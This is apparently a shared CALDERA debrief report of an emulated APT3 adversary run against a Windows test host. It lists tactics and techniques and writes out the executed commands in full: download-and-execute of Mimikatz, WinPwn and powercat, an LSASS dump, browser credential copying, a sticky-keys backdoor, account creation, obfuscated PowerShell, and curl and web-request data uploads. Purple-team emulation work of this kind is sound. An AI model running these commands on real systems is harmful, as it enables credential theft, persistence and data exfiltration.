0% found this document useful (0 votes)

138 views16 pages

Caldera APT3

Uploaded by

dekaya4025

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

138 views16 pages

Caldera APT3

Uploaded by

dekaya4025

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 16

OPERATIONS DEBRIEF

Generated on 2024-04-06T00:00:32Z

This document covers the overall campaign analytics made up of the selected set of operations. The
below sections contain general metadata about the selected operations as well as graphical views of
the operations, the techniques and tactics used, and the facts discovered by the operations. The
following sections include a more in depth review of each specific operation ran.

STATISTICS
An operation's planner makes up the decision making process. It contains logic for how a running
operation should make decisions about which abilities to use and in what order. An objective is a
collection of fact targets, called goals, which can be tied to adversaries. During the course of an
operation, every time the planner is evaluated, the current objective status is evaluated in light of the
current knowledge of the operation, with the operation completing should all goals be met.

Name State Planner Objective Time

Windows-Test-APT3 running atomic default Not finished

AGENTS
The table below displays information about the agents used. An agent's paw is the unique identifier, or
paw print, of an agent. Also included are the username of the user who executed the agent, the
privilege level of the agent process, and the name of the agent executable.

Paw Host Platform Username Privilege Executable

mmsgnd caldera linux root Elevated splunkd

ttjjvq MSEDGEWIN10 windows MSEDGEWIN10\IEUser Elevated caldera.exe

qzuqdy caldera linux root Elevated splunkd

awedjc MSEDGEWIN10 windows MSEDGEWIN10\IEUser Elevated caldera.exe

Page 1
OPERATIONS DEBRIEF

ATTACK PATH GRAPH

This graph displays the attack path of hosts compromised by CALDERA. Source and target hosts are
connected by the method of execution used to start the agent on the target host.
Legend

server

windows

MSEDGEWIN10$MSEDGEWIN10\IEUser

C2 Server

MSEDGEWIN10$MSEDGEWIN10\IEUser

STEPS GRAPH
This is a graphical display of the agents connected to the command and control (C2), the operations
run, and the steps of each operation as they relate to the agents.

Legend

server

windows

operation

discovery

multiple

C2 Server collection

credential-access
MSEDGEWIN10$MSEDGEWIN10\IEUser
execution

persistence

exfiltration

defense-evasion

command-and-control
MSEDGEWIN10$MSEDGEWIN10\IEUser
initial-access
Windows-Test-APT3
lateral-movement

Page 2
OPERATIONS DEBRIEF

TACTIC GRAPH
This graph displays the order of tactics executed by the operation. A tactic explains the general
purpose or the "why" of a step.
defense-evasion multiple

defense-evasion

command-and-control
defense-evasion discovery
Legend
credential-access
multiple
discovery operation
lateral-movement
multiple
command-and-control discovery
discovery collection
multiple
multiple multiple
exfiltration collection
initial-access
defense-evasion
credential-access credential-access
discovery credential-access

discovery collection execution

multiple
persistence multiple persistence

discovery credential-access
multiple exfiltration

credential-access execution
defense-evasion
collection
Windows-Test-APT3 persistence
command-and-control
discovery
initial-access

multiple execution lateral-movement

credential-access
collection

multiple

TECHNIQUE GRAPH
This graph displays the order of techniques executed by the operation. A technique explains the
technical method or the "how" of a step.
Archive Collected Data: Archive via Utility

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Exfiltration Over C2 Channel
Event Triggered Execution: Accessibility Features
Account Manipulation Windows-Test-APT3
Credentials from Password Stores: Credentials from Web Browsers
Account Discovery: Local Account
Data from Local System
File and Directory Discovery Legend

Brute Force: Password Cracking

operation
Create or Modify System Process: Windows Service
Process Discovery
Phishing: Spearphishing Attachment
technique_name
Remote Services: Remote Desktop Protocol
Indicator Removal on Host: File Deletion
Hide Artifacts: Hidden Window
Remote Services: SMB/Windows Admin Shares
Hijack Execution Flow: DLL Side-Loading Create Account: Local Account

Permission Groups Discovery: Local GroupsCommand and Scripting Interpreter: PowerShell

Ingress Tool Transfer

Scheduled
Command and Scripting Interpreter: Task/Job:
Windows Scheduled
Command Shell Task
Remote System Discovery
Command and Scripting Interpreter: PowerShell

Input Capture:
OS Credential Dumping: LSASS Keylogging
Memory
Signed Binary Proxy Execution: Rundll32
Brute Force: PasswordCommand
Cracking and Scripting Interpreter: Windows
System Information
Command Shell Discovery
Create Account: Local Account
Create or Modify System Process: Windows Service

Non-Application
Obfuscated Files or Information Layer Protocol
Credentials from Password Stores: Credentials from Web Browsers
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
System Network Configuration Discovery
System Network Connections Discovery
Archive Collected Data: Archive via Utility
Unsecured Credentials: Credentials In Files
Data from Local System
System Owner/User Discovery
Account Manipulation
Account Discovery: Local Account

Page 3
OPERATIONS DEBRIEF

FACT GRAPH
This graph displays the facts discovered by the operations run. Facts are attached to the operation
where they were discovered. Facts are also attached to the facts that led to their discovery. For
readability, only the first 15 facts discovered in an operation are included in the graph.
Legend

operation

fact

host.ip.address
3 file.sensitive.extension
host.ip.address
1 server.malicious.url
server.malicious.url file.sensitive.extension 5 host.file.path
host.file.path 13 host.ip.address

host.file.path

Windows-Test-APT3
file.sensitive.extension

host.ip.address host.ip.address
host.file.path

host.file.path
host.ip.address file.sensitive.extension
host.ip.address

host.ip.address

Page 4
OPERATIONS DEBRIEF

TACTICS AND TECHNIQUES

Tactics Techniques Abilities
Collection T1560.001: Archive Collected Data: Archive via Utility Windows-Test-APT3
T1005: Data from Local System Compress Data and lock with
password for Exfiltration with winrar
Search files of interest and save
them to a single zip file (Windows)

Command-and-contro T1105: Ingress Tool Transfer Windows-Test-APT3

l T1095: Non-Application Layer Protocol Curl Upload File
Powercat C2

Credential-access T1110.002: Brute Force: Password Cracking Windows-Test-APT3

T1555.003: Credentials from Password Stores: Credentials Password Cracking with Hashcat
from Web Browsers Simulating access to Windows
T1003.001: OS Credential Dumping: LSASS Memory Edge Login Data
T1552.001: Unsecured Credentials: Credentials In Files Create Mini Dump of LSASS.exe
using ProcDump
WinPwn - passhunt

Defense-evasion T1564.003: Hide Artifacts: Hidden Window Windows-Test-APT3

T1070.004: Indicator Removal on Host: File Deletion Hidden Window
T1027: Obfuscated Files or Information Delete a single file - Windows
T1218.011: Signed Binary Proxy Execution: Rundll32 PowerShell
Obfuscated Command in
PowerShell
Rundll32 with Control_RunDLL

Discovery T1087.001: Account Discovery: Local Account Windows-Test-APT3

T1083: File and Directory Discovery Enumerate all accounts via
T1069.001: Permission Groups Discovery: Local Groups PowerShell (Local)
T1057: Process Discovery File and Directory Discovery
T1018: Remote System Discovery (cmd.exe)
T1082: System Information Discovery Permission Groups Discovery
T1016: System Network Configuration Discovery Process Discovery - Get-Process
T1049: System Network Connections Discovery Remote System Discovery - arp
T1033: System Owner/User Discovery System Information Discovery
System Network Configuration
Discovery on Windows
System Network Connections
Discovery
Current User

Execution T1059.001: Command and Scripting Interpreter: PowerShell Windows-Test-APT3

T1059.003: Command and Scripting Interpreter: Windows Mimikatz
Command Shell Suspicious Execution via Windows
Command Shell

Exfiltration T1041: Exfiltration Over C2 Channel Windows-Test-APT3

C2 Data Exfiltration

Page 5
OPERATIONS DEBRIEF

Tactics Techniques Abilities

Initial-access T1566.001: Phishing: Spearphishing Attachment Windows-Test-APT3
Word spawned a command shell
and used an IP address in the
command line

Lateral-movement T1021.001: Remote Services: Remote Desktop Protocol Windows-Test-APT3

T1021.002: Remote Services: SMB/Windows Admin Shares Changing RDP Port to Non
Standard Port via Command_Prompt
Execute command writing output to
local Admin Share

Multiple T1098: Account Manipulation Windows-Test-APT3

T1547.001: Boot or Logon Autostart Execution: Registry Run Admin Account Manipulate
Keys / Startup Folder Add Executable Shortcut Link to
T1543.003: Create or Modify System Process: Windows User Startup Folder
Service Modify Fax service to run
T1546.008: Event Triggered Execution: Accessibility Features PowerShell
T1574.002: Hijack Execution Flow: DLL Side-Loading Replace binary of sticky keys
T1056.001: Input Capture: Keylogging DLL Side-Loading using the dotnet
T1053.005: Scheduled Task/Job: Scheduled Task startup hook environment variable
Input Capture
Scheduled Task Startup Script

Persistence T1136.001: Create Account: Local Account Windows-Test-APT3

Create a new user in a command
prompt

STEPS IN OPERATION WINDOWS-TEST-APT3

The table below shows detailed information about the steps taken in an operation and whether the
command run discovered any facts.

Time Status Agent Name Command Facts

2024-04-05 failure ttjjvq Enumerate net user; get-localuser; get-localgroupmember -group No
T16:30:01Z all accounts Users; cmdkey.exe /list; ls C:/Users; get-childitem
via C:\Users\; dir C:\Users\; get-localgroup; net localgroup
PowerShell
(Local)

Page 6
OPERATIONS DEBRIEF

Time Status Agent Name Command Facts

2024-04-05 failure ttjjvq Admin $x = Get-Random -Minimum 2 -Maximum 9999; $y = No
T16:31:06Z Account Get-Random -Minimum 2 -Maximum 9999; $z =
Manipulate Get-Random -Minimum 2 -Maximum 9999; $w =
Get-Random -Minimum 2 -Maximum 9999; Write-Host
HaHa_$x$y$z; $fmm = Get-LocalGroupMember -Group
Administrators |?{ $_.ObjectClass -match "User" -and
$_.PrincipalSource -match "Local"} | Select Name;
foreach($member in $fmm) {; if($member -like
"*Administrator*") {; $account =
$member.Name.Split("\")[-1]; $originalDescription =
(Get-LocalUser -Name $account).Description;
Set-LocalUser -Name $account -Description
"atr:$account;$originalDescription".Substring(0,48);
Rename-LocalUser -Name $account -NewName
"HaHa_$x$y$z"; Write-Host "Successfully Renamed
$account Account on " $Env:COMPUTERNAME; }; }

2024-04-05 failure ttjjvq Compress if not exist "%programfiles%/WinRAR/Rar.exe" ( call ) No

T16:31:48Z Data and lock ELSE ( echo Downloading Winrar installer && bitsadmin
with /transfer myDownloadJob /download /priority normal "http
password for s://www.win-rar.com/fileadmin/winrar-versions/winrar/th/w
Exfiltration inrar-x64-580.exe" %TEMP%\winrar.exe &&
with winrar %TEMP%\winrar.exe /S ) && && mkdir .\tmp\victim-files
&& cd .\tmp\victim-files && echo "This file will be
encrypted" > .\encrypted_file.txt &&
"%programfiles%/WinRAR/Rar.exe" a -hp"blue" hello.rar
&& dir

2024-04-05 success ttjjvq Add $Target = "C:\Windows\System32\calc.exe"; No

T16:32:54Z Executable $ShortcutLocation =
Shortcut Link "$home\AppData\Roaming\Microsoft\Windows\Start
to User Menu\Programs\Startup\calc_exe.lnk"; $WScriptShell =
Startup New-Object -ComObject WScript.Shell; $Create =
Folder $WScriptShell.CreateShortcut($ShortcutLocation);
$Create.TargetPath = $Target; $Create.Save()

2024-04-05 failure ttjjvq Password cd PathToAtomicsFolder\..\ExternalPayloads\hashcat6\h No

T16:33:39Z Cracking with ashcat-6.1.1\hashcat.exe\.. && PathToAtomicsFolder\..\E
Hashcat xternalPayloads\hashcat6\hashcat-6.1.1\hashcat.exe -a 0
-m 1000 -r .\rules\Incisive-leetspeak.rule c5068b_sam.txt
cab59f_password.lst

2024-04-05 success ttjjvq Mimikatz powershell.exe "IEX (New-Object Net.WebClient).Downlo Yes

T16:34:49Z adString('https://raw.githubusercontent.com/PowerShellM
afia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945
b91253a/Exfiltration/Invoke-Mimikatz.ps1');
Invoke-Mimikatz -DumpCreds"

Page 7
OPERATIONS DEBRIEF

Time Status Agent Name Command Facts

2024-04-05 success ttjjvq Suspicious %LOCALAPPDATA:~-3,1%md /c echo Hello, from CMD! No
T16:35:22Z Execution via > hello.txt & type hello.txt
Windows
Command
Shell

2024-04-05 success ttjjvq Create a new net user /add "T1136.001_CMD" "T1136.001_CMD!" No
T16:36:08Z user in a
command
prompt

2024-04-05 failure ttjjvq Modify Fax sc config Fax binPath= "C:\windows\system32\WindowsP No

T16:36:47Z service to run owerShell\v1.0\powershell.exe -noexit -c \"write-host
PowerShell 'T1543.003 Test'\"" && sc start Fax

2024-04-05 success ttjjvq Simulating Copy-Item "$env:LOCALAPPDATA\Microsoft\Edge\User No

T16:37:56Z access to Data\Default" -Destination
Windows "PathToAtomicsFolder\..\ExternalPayloads\Edge" -Force
Edge Login -Recurse
Data

2024-04-05 failure ttjjvq Search files $startingDirectory = "C:\Users"; $outputZip = No

T16:38:49Z of interest "PathToAtomicsFolder\..\ExternalPayloads\T1005";
and save $fileExtensionsString = ".doc, .docx, .txt" ; $fileExtensions
them to a = $fileExtensionsString -split ", "; New-Item -Type
single zip file Directory $outputZip -ErrorAction Ignore -Force |
(Windows) Out-Null; Function Search-Files {; param (;
[string]$directory; ); $files = Get-ChildItem -Path
$directory -File -Recurse | Where-Object {;
$fileExtensions -contains $_.Extension.ToLower(); };
return $files; }; $foundFiles = Search-Files -directory
$startingDirectory; if ($foundFiles.Count -gt 0) {;
$foundFilePaths = $foundFiles.FullName;
Compress-Archive -Path $foundFilePaths
-DestinationPath "$outputZip\data.zip"; Write-Host "Zip
file created: $outputZip\data.zip"; } else {; Write-Host "No
files found with the specified extensions."; }

2024-04-05 success ttjjvq Replace IF NOT EXIST C:\Windows\System32\sethc_backup.exe No

T16:39:28Z binary of (copy C:\Windows\System32\sethc.exe
sticky keys C:\Windows\System32\sethc_backup.exe) ELSE ( pushd
) && takeown /F C:\Windows\System32\sethc.exe /A &&
icacls C:\Windows\System32\sethc.exe /grant
Administrators:F /t && copy /Y
C:\Windows\System32\cmd.exe
C:\Windows\System32\sethc.exe

Page 8
OPERATIONS DEBRIEF

Time Status Agent Name Command Facts

2024-04-05 failure ttjjvq C2 Data if(-not (Test-Path $env:TEMP\LineNumbers.txt)){ ; 1..100 No
T16:40:43Z Exfiltration | ForEach-Object { Add-Content -Path
$env:TEMP\LineNumbers.txt -Value "This is line $_." }; };
[System.Net.ServicePointManager]::Expect100Continue
= $false; $filecontent = Get-Content -Path
$env:TEMP\LineNumbers.txt; Invoke-WebRequest -Uri
example.com -Method POST -Body $filecontent
-DisableKeepAlive

2024-04-05 failure ttjjvq File and dir /s c:\ >> %temp%\T1083Test1.txt && dir /s No
T16:42:07Z Directory "c:\Documents and Settings" >> %temp%\T1083Test1.txt
Discovery && dir /s "c:\Program Files\" >> %temp%\T1083Test1.txt
(cmd.exe) && dir "%systemdrive%\Users\*.*" >>
%temp%\T1083Test1.txt && dir "%userprofile%\AppData\
Roaming\Microsoft\Windows\Recent\*.*" >>
%temp%\T1083Test1.txt && dir
"%userprofile%\Desktop\*.*" >> %temp%\T1083Test1.txt
&& tree /F >> %temp%\T1083Test1.txt

2024-04-05 success ttjjvq Hidden Start-Process powershell.exe -WindowStyle hidden No

T16:42:30Z Window calc.exe

2024-04-05 failure ttjjvq DLL set No

T16:43:19Z Side-Loading DOTNET_STARTUP_HOOKS="80410d_preloader.dll"
using the && dotnet -h > nul && echo.
dotnet startup
hook
environment
variable

2024-04-05 failure ttjjvq Delete a Remove-Item -path $env:TEMP\deleteme_T1551.004 No

T16:44:19Z single file -
Windows
PowerShell

2024-04-05 failure ttjjvq Curl Upload C:\Windows\System32\Curl.exe -T No

T16:44:52Z File c:\temp\atomictestfile.txt www.example.com &&
C:\Windows\System32\Curl.exe --upload-file
c:\temp\atomictestfile.txt www.example.com &&
C:\Windows\System32\Curl.exe -d
c:\temp\atomictestfile.txt www.example.com &&
C:\Windows\System32\Curl.exe --data
c:\temp\atomictestfile.txt www.example.com

Page 9
OPERATIONS DEBRIEF

Time Status Agent Name Command Facts

2024-04-05 failure ttjjvq Input Capture if (Test-Path "PathToAtomicsFolder\T1056.001\src\Get-K No
T16:45:36Z eystrokes.ps1") { ; } else {New-Item -ItemType Directory
(Split-Path "PathToAtomicsFolder\T1056.001\src\Get-Ke
ystrokes.ps1") -Force | Out-Null; Invoke-WebRequest htt
ps://raw.githubusercontent.com/redcanaryco/atomic-red-t
eam/master/atomics/T1056.001/src/Get-Keystrokes.ps1
-OutFile "PathToAtomicsFolder\T1056.001\src\Get-Keyst
rokes.ps1"}; ; &"$PathToAtomicsFolder\T1056.001\src\G
et-Keystrokes.ps1" -LogPath $env:TEMP\key.log

2024-04-05 failure ttjjvq Powercat C2 IEX (New-Object System.Net.Webclient).Downloadstring( No

T16:46:43Z 'https://raw.githubusercontent.com/besimorhino/powercat
/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat
.ps1'); powercat -c

2024-04-05 failure ttjjvq Obfuscated $cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING') ; $pz2Sb0 No

T16:47:15Z Command in =[TYpE]("{1}{0}{2}"-f'nv','cO','ert') ; &("{0}{2}{3}{1}{4}"
PowerShell -f'In','SiO','vOKe-EXp','ReS','n') (
(&("{1}{2}{0}"-f'blE','gET-','vaRIA')
('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',(
(127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47,
110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40,
120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 ,
41,47)| .('%') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"((
[sTring]${_}) ,8)))})) )

2024-04-05 failure ttjjvq Create Mini "PathToAtomicsFolder\..\ExternalPayloads\procdump.exe No

T16:48:02Z Dump of " -accepteula -mm lsass.exe
LSASS.exe C:\Windows\Temp\lsass_dump.dmp
using
ProcDump

2024-04-05 success ttjjvq Permission gpresult /R No

T16:49:34Z Groups
Discovery

2024-04-05 success ttjjvq Word [Net.ServicePointManager]::SecurityProtocol = No

T16:50:23Z spawned a [Net.SecurityProtocolType]::Tls12; IEX (iwr "https://raw.gi
command thubusercontent.com/redcanaryco/atomic-red-team/mast
shell and er/atomics/T1204.002/src/Invoke-MalDoc.ps1"
used an IP -UseBasicParsing); $macrocode = " Open
address in `"C:\Users\Public\art.jse`" For Output As #1`n Write #1,
the command `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n";
line Invoke-MalDoc -macroCode $macrocode -officeProduct
"Word"

2024-04-05 failure ttjjvq Process Get-Process No

T16:51:13Z Discovery -
Get-Process

Page 10
OPERATIONS DEBRIEF

Time Status Agent Name Command Facts

2024-04-05 success ttjjvq Changing reg add No
T16:52:05Z RDP Port to "HKLM\System\CurrentControlSet\Control\Terminal
Non Server\WinStations\RDP-Tcp" /v PortNumber /t
Standard REG_DWORD /d 4489 /f && netsh advfirewall firewall
Port via Com add rule name="RDPPORTLatest-TCP-In" dir=in
mand_Promp action=allow protocol=TCP localport=4489
t

2024-04-05 success ttjjvq Execute cmd.exe /Q /c hostname 1> No

T16:52:44Z command \\127.0.0.1\ADMIN$\output.txt 2>&1
writing output
to local
Admin Share

2024-04-05 success ttjjvq Remote arp -a Yes

T16:53:44Z System
Discovery -
arp

2024-04-05 success ttjjvq Scheduled schtasks /create /tn "T1053_005_OnLogon" /sc onlogon No
T16:54:33Z Task Startup /tr "cmd.exe /c calc.exe" && schtasks /create /tn
Script "T1053_005_OnStartup" /sc onstart /ru system /tr
"cmd.exe /c calc.exe"

2024-04-05 success ttjjvq Rundll32 with rundll32.exe shell32.dll,Control_RunDLL No

T16:55:14Z Control_Run "6349c0_calc.dll"
DLL

2024-04-05 success ttjjvq System systeminfo && reg query Yes

T16:56:19Z Information HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
Discovery

2024-04-05 success ttjjvq System ipconfig /all && netsh interface show interface && arp -a Yes
T16:56:51Z Network && nbtstat -n && net config
Configuration
Discovery on
Windows

2024-04-05 timeout ttjjvq System netstat && net use && net sessions Yes
T16:58:29Z Network
Connections
Discovery

2024-04-05 success ttjjvq Current User whoami No

T16:59:07Z

2024-04-05 failure ttjjvq WinPwn - $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.c No

T17:01:11Z passhunt om/S3cur3Th1sSh1t'; iex(new-object net.webclient).down
loadstring('https://raw.githubusercontent.com/S3cur3Th1
sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b56
38c5773/WinPwn.ps1'); passhunt -local $true
-noninteractive

Page 11
OPERATIONS DEBRIEF

Time Status Agent Name Command Facts

2024-04-05 failure sbyzsg Enumerate net user; get-localuser; get-localgroupmember -group No
T23:39:52Z all accounts Users; cmdkey.exe /list; ls C:/Users; get-childitem
via C:\Users\; dir C:\Users\; get-localgroup; net localgroup
PowerShell
(Local)

2024-04-05 failure sbyzsg Admin $x = Get-Random -Minimum 2 -Maximum 9999; $y = No

T23:40:33Z Account Get-Random -Minimum 2 -Maximum 9999; $z =
Manipulate Get-Random -Minimum 2 -Maximum 9999; $w =
Get-Random -Minimum 2 -Maximum 9999; Write-Host
HaHa_$x$y$z; $fmm = Get-LocalGroupMember -Group
Administrators |?{ $_.ObjectClass -match "User" -and
$_.PrincipalSource -match "Local"} | Select Name;
foreach($member in $fmm) {; if($member -like
"*Administrator*") {; $account =
$member.Name.Split("\")[-1]; $originalDescription =
(Get-LocalUser -Name $account).Description;
Set-LocalUser -Name $account -Description
"atr:$account;$originalDescription".Substring(0,48);
Rename-LocalUser -Name $account -NewName
"HaHa_$x$y$z"; Write-Host "Successfully Renamed
$account Account on " $Env:COMPUTERNAME; }; }

2024-04-05 failure sbyzsg Compress if not exist "%programfiles%/WinRAR/Rar.exe" ( call ) No

T23:41:24Z Data and lock ELSE ( echo Downloading Winrar installer && bitsadmin
with /transfer myDownloadJob /download /priority normal "http
password for s://www.win-rar.com/fileadmin/winrar-versions/winrar/th/w
Exfiltration inrar-x64-580.exe" %TEMP%\winrar.exe &&
with winrar %TEMP%\winrar.exe /S ) && && mkdir .\tmp\victim-files
&& cd .\tmp\victim-files && echo "This file will be
encrypted" > .\encrypted_file.txt &&
"%programfiles%/WinRAR/Rar.exe" a -hp"blue" hello.rar
&& dir

2024-04-05 success sbyzsg Add $Target = "C:\Windows\System32\calc.exe"; No

T23:42:18Z Executable $ShortcutLocation =
Shortcut Link "$home\AppData\Roaming\Microsoft\Windows\Start
to User Menu\Programs\Startup\calc_exe.lnk"; $WScriptShell =
Startup New-Object -ComObject WScript.Shell; $Create =
Folder $WScriptShell.CreateShortcut($ShortcutLocation);
$Create.TargetPath = $Target; $Create.Save()

2024-04-05 failure sbyzsg Password cd PathToAtomicsFolder\..\ExternalPayloads\hashcat6\h No

T23:42:55Z Cracking with ashcat-6.1.1\hashcat.exe\.. && PathToAtomicsFolder\..\E
Hashcat xternalPayloads\hashcat6\hashcat-6.1.1\hashcat.exe -a 0
-m 1000 -r .\rules\Incisive-leetspeak.rule c5068b_sam.txt
cab59f_password.lst

Page 12
OPERATIONS DEBRIEF

Time Status Agent Name Command Facts

2024-04-05 failure sbyzsg Mimikatz powershell.exe "IEX (New-Object Net.WebClient).Downlo No
T23:44:01Z adString('https://raw.githubusercontent.com/PowerShellM
afia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945
b91253a/Exfiltration/Invoke-Mimikatz.ps1');
Invoke-Mimikatz -DumpCreds"

2024-04-05 success sbyzsg Suspicious %LOCALAPPDATA:~-3,1%md /c echo Hello, from CMD! No

T23:45:00Z Execution via > hello.txt & type hello.txt
Windows
Command
Shell

2024-04-05 failure sbyzsg Create a new net user /add "T1136.001_CMD" "T1136.001_CMD!" No
T23:45:50Z user in a
command
prompt

2024-04-05 failure sbyzsg Modify Fax sc config Fax binPath= "C:\windows\system32\WindowsP No

T23:46:49Z service to run owerShell\v1.0\powershell.exe -noexit -c \"write-host
PowerShell 'T1543.003 Test'\"" && sc start Fax

2024-04-05 success sbyzsg Simulating Copy-Item "$env:LOCALAPPDATA\Microsoft\Edge\User No

T23:48:43Z access to Data\Default" -Destination
Windows "PathToAtomicsFolder\..\ExternalPayloads\Edge" -Force
Edge Login -Recurse
Data

2024-04-05 success sbyzsg Simulating Copy-Item "$env:LOCALAPPDATA\Microsoft\Edge\User No

T23:48:43Z access to Data\Default" -Destination
Windows "PathToAtomicsFolder\..\ExternalPayloads\Edge" -Force
Edge Login -Recurse
Data

2024-04-05 success sbyzsg Simulating Copy-Item "$env:LOCALAPPDATA\Microsoft\Edge\User No

T23:48:46Z access to Data\Default" -Destination
Windows "PathToAtomicsFolder\..\ExternalPayloads\Edge" -Force
Edge Login -Recurse
Data

Page 13
OPERATIONS DEBRIEF

Time Status Agent Name Command Facts

collecte sbyzsg Search files $startingDirectory = "C:\Users"; $outputZip = No
d of interest "PathToAtomicsFolder\..\ExternalPayloads\T1005";
and save $fileExtensionsString = ".doc, .docx, .txt" ; $fileExtensions
them to a = $fileExtensionsString -split ", "; New-Item -Type
single zip file Directory $outputZip -ErrorAction Ignore -Force |
(Windows) Out-Null; Function Search-Files {; param (;
[string]$directory; ); $files = Get-ChildItem -Path
$directory -File -Recurse | Where-Object {;
$fileExtensions -contains $_.Extension.ToLower(); };
return $files; }; $foundFiles = Search-Files -directory
$startingDirectory; if ($foundFiles.Count -gt 0) {;
$foundFilePaths = $foundFiles.FullName;
Compress-Archive -Path $foundFilePaths
-DestinationPath "$outputZip\data.zip"; Write-Host "Zip
file created: $outputZip\data.zip"; } else {; Write-Host "No
files found with the specified extensions."; }

collecte sbyzsg Search files $startingDirectory = "C:\Users"; $outputZip = No

d of interest "PathToAtomicsFolder\..\ExternalPayloads\T1005";
and save $fileExtensionsString = ".doc, .docx, .txt" ; $fileExtensions
them to a = $fileExtensionsString -split ", "; New-Item -Type
single zip file Directory $outputZip -ErrorAction Ignore -Force |
(Windows) Out-Null; Function Search-Files {; param (;
[string]$directory; ); $files = Get-ChildItem -Path
$directory -File -Recurse | Where-Object {;
$fileExtensions -contains $_.Extension.ToLower(); };
return $files; }; $foundFiles = Search-Files -directory
$startingDirectory; if ($foundFiles.Count -gt 0) {;
$foundFilePaths = $foundFiles.FullName;
Compress-Archive -Path $foundFilePaths
-DestinationPath "$outputZip\data.zip"; Write-Host "Zip
file created: $outputZip\data.zip"; } else {; Write-Host "No
files found with the specified extensions."; }

FACTS FOUND IN OPERATION WINDOWS-TEST-APT3

The table below displays the facts found in the operation, the command run and the agent that found
the fact. Every fact, by default, gets a score of 1. If a host.user.password fact is important or has a high
chance of success if used, you may assign it a score of 5. When an ability uses a fact to fill in a
variable, it will use those with the highest scores first. A fact with a score of 0, is blacklisted - meaning it
cannot be used in an operation.

Trait Value Score Source Command Run

file.sensitive.ext wav 1 ed3..96b No Command (SEEDED)
ension

file.sensitive.ext yml 3 ed3..96b No Command (SEEDED)

ension

Page 14
OPERATIONS DEBRIEF

Trait Value Score Source Command Run

file.sensitive.ext png 16 ed3..96b No Command (SEEDED)
ension

server.malicious keyloggedsite.com 1 ed3..96b No Command (SEEDED)

.url

host.file.path / \ ## /*** Benjamin DELPY `gentilkiwi` 1 ttjjvq powershell.exe "IEX (New-Object Net.
( [email protected] WebClient).DownloadString('https://ra
w.githubusercontent.com/PowerShellM
afia/PowerSploit/f650520c4b1004daf8
b3ec08007a0b945b91253a/Exfiltration
/Invoke-Mimikatz.ps1');
Invoke-Mimikatz -DumpCreds"

host.file.path / ## > 1 ttjjvq powershell.exe "IEX (New-Object Net.

http://blog.gentilkiwi.com/mimikatz WebClient).DownloadString('https://ra
w.githubusercontent.com/PowerShellM
afia/PowerSploit/f650520c4b1004daf8
b3ec08007a0b945b91253a/Exfiltration
/Invoke-Mimikatz.ps1');
Invoke-Mimikatz -DumpCreds"

host.file.path //pingcastle.com 1 ttjjvq powershell.exe "IEX (New-Object Net.

WebClient).DownloadString('https://ra
w.githubusercontent.com/PowerShellM
afia/PowerSploit/f650520c4b1004daf8
b3ec08007a0b945b91253a/Exfiltration
/Invoke-Mimikatz.ps1');
Invoke-Mimikatz -DumpCreds"

host.file.path / http://mysmartlogon.com 1 ttjjvq powershell.exe "IEX (New-Object Net.

host.ip.address 172.16.135.128 1 ttjjvq ipconfig /all && netsh interface show

interface && arp -a && nbtstat -n &&
net config
systeminfo && reg query HKLM\SYST
EM\CurrentControlSet\Services\Disk\E
num
arp -a
netstat && net use && net sessions